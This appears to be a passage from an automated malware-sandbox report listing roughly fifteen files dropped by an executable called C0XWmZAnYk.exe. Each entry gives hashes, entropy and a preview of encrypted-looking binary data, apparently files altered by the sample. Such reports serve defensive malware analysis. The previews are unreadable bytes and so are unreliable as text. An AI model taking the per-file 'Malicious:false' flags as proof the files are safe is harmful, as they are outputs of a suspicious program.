              SSDEEP:24:qoH5PxRfe39jA4xGJvTGalO/CSYJVXLd+bD:3xRfw9ev6eSgVXR8D
              MD5:C02C032CF136BBF28DF896088BE53BA7
              SHA1:E3AD64EC3629E0E700FF802A9FD0865644F925FE
              SHA-256:9BF6BF2744D0BB5220E06EC577C6AF41AA9AF827862A737A469FB4E04A971A43
              SHA-512:E86D49CB25727E308B8FE9EDED7E821892E716997DDA5C095172316F2689379BC3811862F997D6820F9C183E1F5EFB5D434C52177B5040F7058108345BA85A7B
              Malicious:false
              Preview:<?xml..t...../...^...(.-....V. b....[.....fgJU..K.e..7.....g.:.....k.9.b.w![..B..1f6ml......9./i.b.b2.8.3.&..D.'I..o....!...F.E.%..$B.N.....lz'...ar..%.*..A..)..PQ..G.Me-.p...h..E....7.D.X.K.B/...A{...B.5..%......A..I.S..>....D.......d.WV.I..qi..k9.80..mo#7.D.I.............b..i...^".l..B........w.......Qu.+O.Z..Kf.G9....:G.E...SU.a.e.8[.c...$.7.H N.N.3...w.*!..@.".[.....h$...p...j>iA."...C.T...O......8.xf.Du7S..y.....@.#4..h.nL......\..sy..i<yF.3..R6.+.h.5..cf. ZDH..9.y\<......qi...-.\.jb:....B.&s..._....r...S...e*A..R;3.....x.."..0....K|.z......... ]B...C.F+(..=[..j.R..w..|..:)^....nQ....#..@..n...b.........+....Sac.v........=....a.C...!9....w.+w.5Y...N*..H.>R.....Q..]...p..^.u.B:.3.w.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1485
              Entropy (8bit):7.881680201466077
              Encrypted:false
              SSDEEP:24:qCmBJDLYKZz4GhMMM7tFMujsvwBrgbv778BO0bzmHQO/065vDyA5zNnwrX9EKd+X:qCQLFB437bjsvlH8BVmHB0gvmA3MN58D
              MD5:DC4B8C798F813356B526A0ED5E7EF47C
              SHA1:23C6E86E3A9CA3015A2FBF4DB18B4BFDCAF11AAD
              SHA-256:A2515632252A931C500C4128F43F013FE9967E1FFDB029705D832E59C2D49F3C
              SHA-512:4AECB10DE7A6056789E37367B58C97EF3252FCC2A74A75348F8D9EB7334125495A69A7245933586B8783E4FE4B826A2BA3184BD0BE8A22468FB4FF932C04E724
              Malicious:false
              Preview:<?xml.f....1S,...X...&.t.q.k.L..gN.4....XL.3.ha..vW...,Q0.t..s../1.'.{.l..Y....m{..7.."...G...M*2\....d..x....`..i.4.....V%.......U\(=...k|...........E...L......C.d[t>...u/ xtaw.y.I).#......0.A..e...b.gV.9..lz(g..D....}Y.].b.7{h..:Q.g..<1.<.....Y8..-.....?....l*..%.FOXg.0....y..'$}...Sr......H.....]...k..D...t.Vk.K;S>.g[[B1.>..f..'f< 9F..........OkA.Z..9t.2..|`..e..b..?7.)..M......M.@I......2~,..mQ.0......q=.V%{f...p...Sr..{kDn..3>..*.,)9...T...........+\....:.j....q..<s.|. .v;.&...Qc.j'.....4..:b......\-.^.....9...8....=.V..(.....tO.r..?.v....S9......../.. E...;../Z..{.DS.."..\.<...,.?Q.kC...U.|..d.~...w...d....A=...o^..-sY.r.%..p..p@.68....<.^...?1....Ji....y...b..5^.UP./|.n..>6..f?Q....(.d......E.....w..0.'5&.........w.^.S<....8..#.YL..0.q....MJ...iO.NP.je8..P..JCVk.a..d....!u....4....Y:(.+.H.....j..B..x_.I.@h.....0..kW...[N._&...............P.{.b.9.............\..9s..-.0.......~Kp.v..7O...s...Lx..XM.x2}.O.. ...y.a....eu
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1340
              Entropy (8bit):7.839280428428563
              Encrypted:false
              SSDEEP:24:2wdAn9ecgt7zJJ+o/tTLimENFabv5+OFcWqrWG9iabSwKC9w3d+bD:XW9et9zJJZNq+MO5qrWGH68D
              MD5:26BA6B43CEF7136D1AE1F0DE96D33724
              SHA1:194D0B3CD78F2FE27DC8E7580DED9281A7434576
              SHA-256:FB164CAFD819C3DCC8141C98D66BC93C1ACD348BEC991C928EF9AE3B7740CA90
              SHA-512:5522870708D348F0CAE73B223F9BD52D0CB1C730A435CAF2BB7EA51FE805D737F98FBAD2477CB6BDA4331903493DCE4C4BB5FDCD05B359EE721EB05A539C2097
              Malicious:false
              Preview:<?xmly.........Uf:..2./.?.x.`.l..\..f.)U.w0L+b...Z..\...4.!w.A...{.e.G...b.T..=....0x@.l....7W...FO...<[.* 6.$.iXK....Q`./.....b..,...%.).i.B'\.~^....hy.......K......X7Ez..f..5E..D..A#..J...I..... ..........n`.r.7.........)@mK...5...h..kZ.f#P...$.......#.W.<.~...Z..i.....:Q....|.N...,!...t....K..vSL........G...K.*.|...B...X...C."...4...J@.....Y{N...Z..ql...G..........)..m=.'.....!..:.rJ.{o..H..L....?.w.K>.....". 8H..d...DY{oK.oiO...q.p.ocX.../....$a>&V....N\C...o./L_kfC@.H..#...'kE..W.G'...:.....2.GT-......,..L.w.]...m.;L....Mo.......8%...3.W.Mr.f;r....I.]7.V..x=<.Y..JO..s+(a=V=>...?F$0 ..S.....5..g..yX8,I..1......e..,....~......a*e..1.I..7.....6|8-...#.p.A(.R.../.b:.W......LVb1 ...[...ii:].Q.x.....:.=..vA.:.......o..:......7hA,......"3..S.x..i..Ajl...".#.......`..I./..x.~..h..(;V.E&."Q.EacLB5.E(..q......O|.6MP mu...9..Z...pM.....bOmf....?..... .........%.......5...:...;:.G.T..".K.P%!...\....4.X{.}#.F)....v....j..F......~jI...Z.b..-
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1261
              Entropy (8bit):7.835905972153304
              Encrypted:false
              SSDEEP:24:hrRkrI+/0HXD/n8JuM3jXQcQD+p0XUH8vGs8MaxGwzK1/65T2sHbZd+bD:EsS0z6uMUcc+mXUH7s8MYGwz2/656sX4
              MD5:9FB7B733822A6097E0282F576D65439C
              SHA1:300CD1FECA65BB3833BD6D5E387BE31A1C4D1544
              SHA-256:2463AB7C7434A67B2679458403E1C9F080997209FBAD37F03F98CC366CC59C9F
              SHA-512:F287D966A2CA5789A9EE8CCFC5CD5C46E35BA855822B58A7B392F53A32C794B009AEAA56332DDADD6A49442EE81C2994D8CD0F61991B0F81EDC3D129B262BAA6
              Malicious:false
              Preview:<?xml.....;/.....5.....{3.5..V../.......c.7.............$ ...rN.pc.{TZ.*)..u...7FX}v!..... [.W..:..6..u.yv....<..GE>.n....WrO"...D...H........d...y.9.:~XT....L..,.......,XU&>ES..Zzwd.v..9S....H....Om).zK....N..S.@~8...9.oV.n.HF.{.....{..Ehi..c...<....+=.6-9..w.NPC.g.._$\O..=3........*...U.QT..%z....Z.y....:...6.XF.k..y..xb?..{*n.&Rx...H`....I:.g~...*s.J#..H......X'C1....L.7....g..w.S..n..G...1h...<..q.A...)...XJ...>.....ZFa;BV.....-...&PG.....&...M....[=...K.8..C.;V.....<@....o.)lo.x..k3.qOYo....U|.....Dp..c.....bo....?iB............f......A.~w......2."P.....~.!.)e.*Pi..h.4)..W.....!.:.....W..S.o[F..A..C.s..Y.@..Cs.......7...._..7.*t....&..C..i)..@|S.4..?B3.~...S.t..y0.|!.....~6.20H8x. .1..r......k.hf..g.w.V...+..A.%..(...,.E=....=1......O...].8...)G..?.i...5*c.V....>.c....@k....{.....].l..0....:.).o+p(.......e....Zfs$,9 ....-......b].....H.Z..Br.:.3.....GFX.._ ...`.6......@.[1w@....[..`..&...Z.WV.e...5.R>?k[$.."..f.G..I6..{.n..Q..w..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1268
              Entropy (8bit):7.862730294331497
              Encrypted:false
              SSDEEP:24:sGrMXeaahRe6IqXik2V7RFkf1/v6VHzDupEUH89m4XUJejWU9Eld+bD:s1XeaaDSF9ufVuDulHj4OmOf8D
              MD5:BFE5952ED47571A8D815BC9E2E8066BF
              SHA1:3F2CCF1DAEF74C97ACEC9B2F169FB3FE06FA5875
              SHA-256:891FCD181C7A6E219DA3EBAB9BE9BA73C1023D20C74243F39CCA168CEEE0A681
              SHA-512:9C2E012B71B09B2664A28FE556C3F0ED235D1D25615FC0251E740BFF6951CF8CA9F81F46BF5EBE7B277FDDD1BF51B3D8D60DAC3DEC828748644AE10986E4FA6A
              Malicious:false
              Preview:<?xmlO....MO)<..L|]....?....:_..P.Z)..}.....Jb.L.............j.:Q...F.:..l...E...9]@k......jrB.4..Hgj*S.d .J..Z`I-a..W..f .Y}k.L5.#...SB.7.a....bn....".....).!.x.....ML...).....jd.>.x..=...I'..0s/.I..8L...X.A..WZX8.7..2..FX..dn..3....8.I$..N...A.I..e_..W..........j...d.....o.i......"eh...R..p.@...W.[..8v.."..c..X.....JE!...0]=........@In>.sR..\j..K.. N.5+Z.x...:...TY{...I=.!{`.Y...n.K.,.....V#....s.RM..X........7'.`..@y.4 ..........XF...f....L........a..)z.*B..z......g.\Z...(y.y....h.c..Q.:.s...lO9";....\6R...y.._.b.h..R...H1.{G......3.&.B:..v^.Y.d`E^U..<!...n....D.u.K....... .*Gr.jr7...<..h.....<f8...!:'=s._..[CUJ@.de./.."rV.-._M.MM....f.V:rY....P..=KY.Y>|m.#T ...g5`P......i.....`...=..+.JB;....:..=.......Tu.............@Y..w.......s....r?.2..XUhA ....:....1...Xy`.$..&l..b..|,.N.^...a...)!...az.>...yE.......G.?W............j.nT.n.....?.U.M.....Y%;....x..>..o....o.I[.e....EIv#>......0=Gd.>d^.......8~.....{.N._..R....Q......b..dJ
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1815
              Entropy (8bit):7.88608884400057
              Encrypted:false
              SSDEEP:48:hEK+0XSnNEPzAF7Y2Oeyk7KZ4bNV80dEe5Q48D:hEK+nwUIeykuZAFE0S
              MD5:3410109F11F4A652EEC240B6D6A7B5FC
              SHA1:B975B0C87A390511F468F60A439073BCC2DC8C87
              SHA-256:78F1CC544F3FD24CED67E29E03642A16754D7999CD775175F705FE832E0D27E6
              SHA-512:1FDEE8544BC70E9407242647A68F1DE9EB3880875B3A5DE9C5DE8B1B21D75ED75B51546998F497F19AFB63F22CA379C3FCC079FF14FDDBCAE877B302D6B7E562
              Malicious:false
              Preview:<?xml..67.H(..fd[..X...V.....jo%....{.?...2.u..\b..d|e<#z.]........^.=......Y....O...NExz>..N;..f.(.].qi. ...q.4..."...r.R....A.'.Bn.l=.,;....a..ZFz......e<....D.+.....fh.v8%Q7+.'..8=.ci.....W.i.,U...;......./..h`^%C...../......E>...)...;.%.........H...)L.B.Q..y..$j...lA.v.Sm`..v...\[..W..z..d..P..+......F2i...#...I. d..?$...4[~...C....9./c....Z@.&..H.I^}.lWF."<^p.7T..M..F..4)..=U..*[..B.Gjs.6<.....iS~`...%.....%p.fji.....cSn...6R.Z.Eq.nDw$..X..A.g.3)..b.#..&d*U.....&...1u..~...C."l[.....d_#...:-.M.g...u..n.D...eL......).*b.U.`.]{.u...w...!.#.#...#?.........c..C..E....BUBn..;-tzK.1...KM.Xa(...T...`Q.g.Bt.~..zN.:;...'....p........$2.z|.....(.o.WZ.@E.l.F..*QL....T..B.*.2}.%........<d..Z.5...BJ...Z..1t..t\....6.B..tE.p....i.^MS*.B..S0q...T...&l2.4.i..}...qSX...S.!|...tT....K.).'N.[.).....MC)..........X.......4.4.uph..~..0.{~..dh.jx......7G..]...s...v..~A^.|.A.8..~..Z..p/.(..7Y.22.".0.`F...C.`.%pe....._!..q.oP(...?H..c...O..".|.T.].2.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):7.781360575879959
              Encrypted:false
              SSDEEP:24:9H6sYXsoFnbK1VuzZal25/jVGejoZsX0R8K+WICKR2hTcAk5d+bD:9HUXJxWruzZBjVpUkS8KVICJhHc8D
              MD5:0BFD6D374C58FB5D41D85AA2210557A7
              SHA1:D0537AAD2AA47CD15B89CB45E04C8B1A4CE32B90
              SHA-256:2550C208AA2DB45559CC0D0C6691E95338798FF597A456EB453B469E3E06805D
              SHA-512:56B26D3F20959ADD8CE69F4600426CF6ACC20E7530275FB4872F6C702ECA52FA40E7884F0E43FFDC07B9E53FEF7F3DEBDF76D780DE38176A445D0C4EBE63712B
              Malicious:false
              Preview:<?xml.h..#5.}.-.....i..F..... ....M.X@.Z#J......W.z*7.{..E...J......XF.A..K#D#......Kt]....&......[4.@..L..3..=<.n...04-........5.!.d..;.V.O.-o.......5..K... V..8....5.]...E.....(....{...N...T..m..Br..W~......_R... R....OV..3po.:.._Z.(.m.....r.#`h.....{.$..%..+..fq.e.w.p..%...w....E.v...*,j.3.l..7.........N.h`....D...e..i7.I.....g..i.%..]..M%.NG...I.G0..EG.j!8....&...^..E.3..(@)>.S.f..8m..H...z.....B........LS.v;.v...zL......s.......9.Xl.S.[..x...Y.......`.{..v.{>.:.#..3cw..)q.....F>_7.v...vV1R...6....J./%u/.._.Mj\...B>....2Sg$...IOg..r...Wi._+.m...*.[..}l.,.....t."....V.../..g.....T..'.....fo.8Q...;...:`...B.^J..E'..V.@.....@..DRc..PlU..D.ec....X4?..q%E...sL.../*..e!.t_.^....}.Sut.K......xB.9.yD.~.u..]..6....1.....x....^1..g!z..g.}e..Em%..aEi.j..^[.7..k.9.M....@......O...e.B.X,`v..>.+. .j].\.kC.q........&..P]........7.....6v."....G,...%.V)...]..*..l4.n.X.OQ.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1950
              Entropy (8bit):7.88519898731511
              Encrypted:false
              SSDEEP:48:fbFtDZBmEyco6H/qZ41mdneMpt9ThoLtpSQLWs8D:fRzQtb6HpqLD9ThoLt7q
              MD5:A8011EDDD9341D7C06392DE8A510E249
              SHA1:F63BFD4697842CEDBD1A7525BA0C4887C4758D26
              SHA-256:B90618C630A878BF007AF00D4E9CB7A7D562539C51A85F472F802F809429B76B
              SHA-512:DD8909BEF3DD4C2ADD12ACEEB1D8D86C1297C5FEBE256CEC3C7FC2097FFE231A97B3A3A416E655431A3E648F109A412D9F486D051B1A6823A98FA33A6C24BD10
              Malicious:false
              Preview:<?xml..*|....1.$K...'R_..`A...!.E/.!=....h..4.m6...g(%e;.-6.Xk..G..q.7..J...S.w....e7..#v`.3....E..irW.c...V..u.cH...kf...i(#.."....s|....-...T..ucH....Ow.} ......:p....U..F~.I.:.;.g.S..f.8..OC...B;.]...0..~..p.`..-IU.......9).XG*$@h.hcS<%....c>.J.......O.:Up...6.Q.#F..^.Q......A.`....PWJ .#0.[cng.Y.......H.O>$...|...P.....R..u.A6.O ..=A..d....gt.X....!..e.w.-k..v$".......z....3..h.Tp..A..~.3^G.....#.....5.&%.c1....H.}.9.s...J..@.S....0..I....`65.........gUv.r.#'.6B. >._K..6.?..1CH.......e..e....CD9..G}.}P..5....i..d.)....I.....;fT.'X.W6..f.4JX=dO.zNR.(Qt.am.12u.>.h.eX'.9|.o7.........Me....-G.EC..;../...Q......L.p.Y.F........g..u....9...0.........V.......AR.H.%.<....Z.N.F..\.HU..l=q...P...'%... X.V....9.g.,..F.W.h.[.1h..1..'..qS)<...I..z..w.!...M.2...p.O...mB"@..J]..7..K..$|....q..M..J*.+....v!T....Of....Z.[S....Kw.@W...t..F.+Ba!.......q...l..YSzIF..d.............pj#..q{.....o'"...P..zo.Mr..G..{P....+w.E...rY). !......3S..bk..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4121
              Entropy (8bit):7.955045376595129
              Encrypted:false
              SSDEEP:96:9gHDr1VFlalkGsSsbprmZh0caCqkdKyNPRB4yB9VJ2++:IrhA9sLdmZgCxHB4aXJm
              MD5:82C50F722B0A1B3334B74515EA038803
              SHA1:3A4ECA282FC2BF58D6C32F94BDD1F1AAFD6D11FD
              SHA-256:9D1CC2B4E568CCB7EA81080E02C603986C2A6353A0C37F25017BFB10E6BE8B88
              SHA-512:5882B82483DBA8B96D631F287DDAAA1A17D074F6965A3A84291909E08C568CECDBB88940A556F3845574724E6903692B62F07DEA5E7D72AF9C9E122356F89755
              Malicious:false
              Preview:<?xml.8..c.Z.&4HE.....p..HW...4...5#..rb...p.O! LV.2.;...MB....z.G.%^..}.wUW,..x..K..C._5.U.r.J.P..]YdQ..j....5.U...1.[.....uN..}....*...Ku..a..+.;.[........z...&.......IJYT....tFJ.A.5..^z....Lp...Oe-..J......E.. ..................$.dN....#.,.s.[S-..Q...m.v..n*.J........Ys/......%..o..!...G...:z...ot...C'..-,....*.A.P~z....!L...z..".)U.....V;b.l..C..;....y..`.O..{C.kO4tw..../{_5,......Z....+n.}{Z....a..w.^.u......{l.ft.....x.l.7.d.c.^..D;..v.4."_A.b.V`..x....z.S.z.'..g.C.....R.p9...fN...rb/O..@YO.(Ed.j.l..aP.......;a...R...N...w.:...4.e.n.`k?3q.tz.4. .H.p.dNVt.5.. ...<(].l.H.0....*.pH.Vm.]..8....=AF.A...J.E..O........K~1<\.x.f4&....7.M5.h.BO.7.8../p.(x.P..m.R.Y.S..j..7...}.C......e..2.^X...N.W....>....D@....V.$O...L.b.H..v...'&..........#b..\..80................<p...%...y9DP.C.z9.HG@[.r...tR...d..\..$9&..........a.i.....Sg.....T.F...oS{.4a.K/<..UA.2^.k;..%-..0>..|....|E........}..a8......t.....6...!b>.6vs7._..T..f#.).7.J..uj.<!...z.=.%+'.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1585
              Entropy (8bit):7.875975139609829
              Encrypted:false
              SSDEEP:24:ibSN8cl4CMHG1f6fgMV4BKJsm5jteOyQD23RIBhcWijBO8gKdNMBQiw1bd+bD:W+8M6JgMV4AJ3ZPhD2hDWiFOmVd8D
              MD5:9F47470DAB6B544B2E74A517BEF11BC0
              SHA1:896173E1D121AF5BB1C4E22432F799878E4A896D
              SHA-256:581BB054CA77E6D1A356573DEEE25D827CEB905D628B96EAF7DC177E1A078F6B
              SHA-512:ED83A3A80CFBC7D21DE0AA0A16FB5DCA3D079385A40E7A81549C77DBF683CAA9E9659D7C3CEEAB6B436F456EB59FC36E90EF08AEBBEC25909D703102B95BE691
              Malicious:false
              Preview:<?xmlZV,.y. .'........1r....K..4[..A.6x.9.N..n.D.E."c..u.."..i..-...9......8.kI..L..&&")...P...2..*..M/.'.q$H.s.......Me.y9=...E.b".}....T*.._1...E...Q0.q.K.r3..'..OM..q..&.A..O}+B...!.........o..\.='.=....4..u..K..c...<.....?f..5....f.'//..G:.).!..fP.L.8.uk......;...K........-m.;r8e..Kc...<W.z."..m.].O..*B".""B.8uO...d..E...19.O.._4.....m.;as..Ix..5.&%.D. h..d.'..Q/r...(>..i.Lg.RB.Sa@.s=.MP.dz.9,.'...#>2.h....Z..`.{Q{.?...Gi...K.[a..3.a.b.......o....}..C.OG.r.X....L...od>....d........-.....5.N.#....OnZo&`.....q.z...@"^.Q.9`..>..q...<#,..G.....8.E..|. ....|]...M.=....\...D.Z.F.13%.VC.<..O.-...,y.....OC. ._.q.2.N.)..E...E..1.ou....c!..F.{a&.D{`...^.rL./......M.....k..L...G.p.7...{.n[...9...1>...FZ..... .=.$........S/..H_wN....j.3...]....T)....(fi..U.~.'}.ob[X`...i..s....L.8u.~...4=.iS..{q.C+6M.S8.?......m0..:..>......).\B.y!.r...t E?2[6.m..o.<...^.../l.BV..+8wB*...t..).C;....S.z.....G..k.U..C....j.|.......m..........#2.......5.a...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1939
              Entropy (8bit):7.883837130033543
              Encrypted:false
              SSDEEP:48:dqWXBUCCVTdGf1PaR0Gd362brNYqlfxjWEO2G4q14hS8D:dqUBUCCVBGNsBbCSw4q1e
              MD5:515F9F024BEC2A1F4FAA6C67076F4B36
              SHA1:F88409CD1F0B6EC7C1241BC33CA051FB3685F376
              SHA-256:CE1F908902835EAC36523841A40CEDEEA6D97FE04D495553CA02158B5CEDBCF5
              SHA-512:A801EF15A752A10E51B7AFCE2413CC37614E95254EAFF66382B7E68A2D2555235E5A74DB91F3385DDBA2E8898E2885F5FB4426D63601F4D642D705BA73EF6330
              Malicious:false
              Preview:<?xml(..5.u"..G...D}$.S.K.3.P.6..U.....|........"rD7j..On..=..n..i.a...r...I...8#.4....1p..`Z...vN....P~C....Jr.@...WXP..V ~n./...x^xe....R+.`Z.....@..`g......;.O?....$2NX-..d.."....... .....~.i.)\....[...H.{%6._....Q.k.....R.pkO..`-R...G...a^.^...d.to..V.~.N..0.#...2...2..g.....7...wc?2e.9.5....z.~10..G.../o7{...H....sU.k..G...x...z.....4..9..."h.I.Y14[3.....V..?...u.:....oU{...wDRux-".;..C...s.....x.uZ.+.n..R.S..q...).....*O...G.%...a:iT..T~.....~.....4.=..U..@?....Y...N..)...7{..0..l....4.'..-.2.)..~.R.bB.....d..]w....y......(..E.B...e..w]9.,../..n.FS2......Zz.tb.....WX...p*.."....<j{..3....w....`.B..W..dF/g.) #1.....a}6.;...}.5j.......&......PW.......6.(....m.....3.......i....N!..N..:..\.+.....0...e.....C"..2+H..c...J.KG........!.,.._..h.9.....}.J&.q.y..D.[...*4.^.d....Zyd..._lM..0..Z.Y-... p...q..t....S}.]..{..@=...`.D.n.0/.qO.{x...)!..|."JyGXy.......O5..f[...;6......#....'...z...bh+...c.....l.u.=.....:..r.......[g..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3091
              Entropy (8bit):7.9435604229547945
              Encrypted:false
              SSDEEP:48:Bano7j6rbf32F6KMeVWFdCMI5pd8YADidDGN50QXwAc4GqZZpwqSpJuoHN8D:BanV3SWeIjILweW5vS5qNYC
              MD5:BEFCB0B3AC8637F34A7125C8D5CFEB16
              SHA1:9181688BFE248324F8C62A2B8625BD6A0EE3F844
              SHA-256:75B552DB13600750F5BF5B29290FE16750105A1E03D45024357B42FACF24FB81
              SHA-512:E29F0B968DC30524BD3F39C9078FB6A1B18E4C6546AFB7F886641FCBF91CF8376D9A42E6F6E60B9D567DA43466E1987E83741FEE7DD76DB43F4CFF50A252C6DE
              Malicious:false
              Preview:<?xmli.4..8f3XF........k..U..&...R...U:..4...AAN.&...WOE....X.3...0.K5Mw....<b..]......V...r.......w....q.@&..Z.....d7$._|..5....2@.W..|.......<....g.....`<.K..:..P../..L...W.R...#.3..!.W..#L.....u...b<[..."..0.|M:.....H.}.SF.......'......Oj...n....j......jC.(w.[....G...c!...wR....J.2.".....G.#.,.Fup..S.........1.M..*".N..i...y...Rv...J"S.cq....F..H".w.U....7....:.......G?#.d.W..n...|.H...*,/..j...d[U.YvT..z....T.v..-c#.j}.4.y~............%3.[..`...1..L.....@<..CS.......R'd..J..........`A.TI..!......I.vL.<.(/...K9.;ck..bwu.BYq=(..].(..O...$,..d<.*.h)v...-.-..FL?.&.l._..^U.Xl.G|.t.....#Fs..0L..;...~...{"(b...W|2.0ZW.#.:'6.g&.W......l8PR.?(....FP2@.....^.4.T.#...NzK.....RG.........l..Q....}.mo ....IQ.......jE...Y..*..p..=.H..{..2w..U~.VLQ.nI..B2."......P...K...,....?A...b.g....)..h.L.S<...Cf...e..Cw.nC....#.k.y.;..{7.G.....E0.O2....&.y..m....6r K@........c.........Y,...he..K.c.w.7....._X~....Vk...B...M.'..}...7I.....z.....$.r*q_.0.?..(f..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):7.785335433871171
              Encrypted:false
              SSDEEP:24:scI8ZR8+x/1awgpmBJIOqf5fmhp8/3IwL9iZAs9dd+bD:sR8g+Xawg0BJIFtmhp8/3NgZJ938D
              MD5:FC1688F9B925150D985F22367DE05ED3
              SHA1:6056963602CEE76CA14601E0E5C4F02EE5B1B76E
              SHA-256:8B2325FDF7BA2F7F78CB8E3A6FF0541E33632FC35424BAAF72A7094BEBE4D129
              SHA-512:2A880F2BE181D832593DD79401E7F62FFCD949E7F58574C83AF71CF7D2810F058369CA2EEF3FB5B38B9C910FF18F813744A6014A875516E5073743BE0C459ACC
              Malicious:false
              Preview:<?xml.t.0..6..h.y...O.lF.m....v<..".?...g..,?....pj.....+.....gY...o..,..;4..R....o....u..4..........i[..hB.3..3 .`=h7..Q.E.b.._.....yO._...W.=.n.P......|w'Tk.5.7.2.I.>.{...Y../..8...?c"..B......6O.`.G.L`...?....G9\.d..;..a........l...Fn..%......l..g.&.....s..".c.~.I+....{{r+......d..d....'.U.(.q......-x.cb...@. g%'a....3X. .R.|...P.....PxL..w.8.0....B...._.......rk.{..o.3T.~o...M.nI.Qm.N.....F{s.F..dK5...F.j....r..!.4..c...B.M.......#M.T.F*.f........2.~...=P..O...&k.X.. .#(Y.,RM9...@...$.C..E..F..:.~.,..G....K.#.H.%.MJRV.P...U..gI.@.......h.c.. .a...d........./..N...jx...F....J_n..Z.P.w.WxM..S.*..Ne....8...R..D...$.l..z..v.{.....~...w..c@ .$_../..)@.+...r .C..U......k...~.....j..n%_...M...,.w.....h.P.6Q....<....@38D...3........k...9...YO$I.gm4J.9..F...H.........p.K..LL...I..Z.........^mvXH.A...[..-f...:.-..u>.,...2........v.:*......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2404
              Entropy (8bit):7.927869557037047
              Encrypted:false
              SSDEEP:48:wBJSzK9PVygvV9QjHeE5Z0htnbXhCiFr8VCNoP6bDpI9+V4CsE58D:AJecEvTeEMxzL58HyblI9shsEG
              MD5:35936FDC753E5A51CB327F152EE50458
              SHA1:1F81E550B75809D2BC45C230311989FE7F69FFC4
              SHA-256:6096B54340E864E835E98C26370186E81D5068912A715540A9419FDDB5621B83
              SHA-512:DD799E953B53CF931DDB41C017CF84EBEAC35B1C7508DF9608DDDC58E821A7CBD260A6A461E388D7449CD8EBB7DA972408465AD9FE67228B3CF9D55C5C9173A8
              Malicious:false
              Preview:<?xml?k..........E........t.z?8...1n.."...U..#..x.}|). ..+.J.t...'....#...w.e..@.6siXD..{M.........v.4.u.u..T..%......9b4..7%................U..V..0.n...c]..~-NM(..I..^.E.]......K(<w....;*....r.eI<.....1........5.9]m|b..B_e...tY....~.......m.x....}.......]..................<..([..C..g..3a.o..`.v....>.l.../........x.....A...V..<l_..SY\U..=y.....Z0.X......v.3J_..$.......s..{...qZ...l.........b.xVa..1f.G..\.w.#./._...qg.P...SO.`7.zjN.ee..4..|..b.;v+3..S.t..gNo.?.e.4.......kkD.........m.^..QU.....et*.a.. o..EoJ..>..`.?[_...8.....|sk..J%.J..f.&~...$.F....V.Q...|<-...}$Bl.bT../..WG.<.H?5...E..2K..#..E.dl......*..&....o...,...$..K..q.av.>?D.qe...........|..7.#2.eu.v.\.......Y7..QYb%5.o.Y..#..H...I.^5.<R.]...^....T..s..rX............#.CT...q.-..tQ...."g.9$^.Eev./q.....o....b..OJOZ./..r.M....#k..V..d......^w(..%.3.. d.}D..h..!.......]..;7.Q..`........`G...C...d...%.A...~p>..N.0.-3........m\.6_..e}..O(I..... .=..`Z.A@..?.z#.oS.m.:
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3203
              Entropy (8bit):7.943832235106905
              Encrypted:false
              SSDEEP:96:a+dZSPbPsKjJklaDlwE7gZ/lZNV7j19TI/GPYPjG:aqZSDRNPlwE7gZ/lvVH19TIWYrG
              MD5:4130E98DA4D4ADDB1D3D952855107889
              SHA1:605B872B85F8671E3D2927CEECF66AC4CB34082E
              SHA-256:FC1CC95A42F810E717CC86F83CC9BD49FC29FB14067060DA8A86AA8CD7AC988F
              SHA-512:014B98CF5A64CEDB692B502252D7B5BEA95CA852CCAF443FE420A89E2AB49EDE26D5055DD917981BCAA6BAAC896A71ACA33C1CD0A3A4085694702044B370D036
              Malicious:false
              Preview:<?xml.{'Xnz..}h..APT`.!d._.di{......?..C6.P...8q...iuZ.@`.(...9..]..a..k..#.J.c.(.2.A..@Q'....)..c.0..!..,i..Y=...A6.v..R.k.M.IICX.9.....W.}B%.pCZ6..-.,.....9ohrw.....0Do.D.K..<.#.k3...`|..na.j0[. ..=j.Ip....p.#d*.y..R[.=Jj..??&.mShd..t.J4...X.........F..Hf.p..~....Nr...........-o.,..4O.d@....1-P.b.7......f$.B}..Oz.i.}..w....XQ..w[EIv..\;.,.u....DQY@. ".P....{. ....q..$.......Z0A...[..M1..h.3...t/...).'.5...D.Tf,....Q..e.,...0...!.T_KX........].9nx^;.....P.VS..=(.oX.3.&\...g.]<q.<..p..W....\..y.../X.?.-.\.).IW...7*!<.R.....if..hiH.....e....{....n.R.K.'.V....#B.+...;<.....Y..+...u.S?..\|.$./...........8....}..J!w.......l.....M....gJ.."S>-nL=..P.x|..|\\'.e..D&yj.J..G...s.&..|v.6Hb&5....7..j.,..<.(X.....u.0.........0_. HF.E..4..C.....*...)..&../.....~.......y.y...x...}Y.......-Q.G..I..z05V.h=..&.>..ww'S.@..l!...4...8w.`.[.w..._/G.6...@....QJfi.H.+...C=N.:.^...0...O3.m(7..q.w.3a.~.MN.U...V..?&..WzA..T.........2..z.;..Z.6... .X..>.K.m.....9..B.[=g.....
